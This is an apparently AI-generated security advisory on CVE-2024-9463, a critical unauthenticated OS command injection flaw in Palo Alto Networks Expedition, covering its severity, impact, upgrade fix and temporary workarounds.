Overview
Palo Alto Networks Expedition contains a critical OS command injection vulnerability caused by improper input validation. This unauthenticated vulnerability allows remote attackers to execute arbitrary OS commands with root privileges. The vulnerability exists in the Expedition application and requires no authentication or user interaction to exploit. The vulnerability was disclosed on October 9, 2024. CISA has identified CVE-2024-9463 as being exploited but is not currently known to be used in ransomware campaigns.
Technical details
Palo Alto Networks Expedition fails to properly validate and sanitize user input before passing it to OS command execution functions. This improper input validation in a critical code path allows unauthenticated remote attackers to inject arbitrary operating system commands that are executed with root-level privileges. The vulnerability can be triggered through a network request without requiring prior authentication or user interaction.
The vulnerability is classified as CWE-78 (Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')) andCWE-20 (Improper Input Validation) .
The vulnerability has received a CVSS v3.1 base score of 9.8 (CRITICAL) with the vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H, indicating its critical nature.
Impact
Successful exploitation allows unauthenticated remote attackers to execute arbitrary operating system commands with root privileges on the affected system. This enables complete system compromise, including data theft, malware installation, lateral movement within the network, and system disruption. The root-level execution context means attackers can access all system resources, modify critical files, install backdoors, and potentially compromise other systems on the network.
Mitigation and workarounds
Upgrade Palo Alto Networks Expedition to version 1.2.48 or later. Follow Palo Alto Networks standard upgrade procedures for your Expedition deployment. Ensure proper backup and testing in non-production environments before applying to production systems. The following versions include the necessary fixes: Expedition 1.2.48 and later.
As temporary workarounds: implement network-level access controls to restrict access to the expedition application. use firewalls, vpns, or network segmentation to limit exposure to trusted networks and ip addresses only.; disable expedition if it is not currently in use until patching is possible., and monitor expedition logs and system logs for suspicious command execution patterns or unusual process activity..
CISA's recommendation: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Additional resources
Source: This report was generated using AI
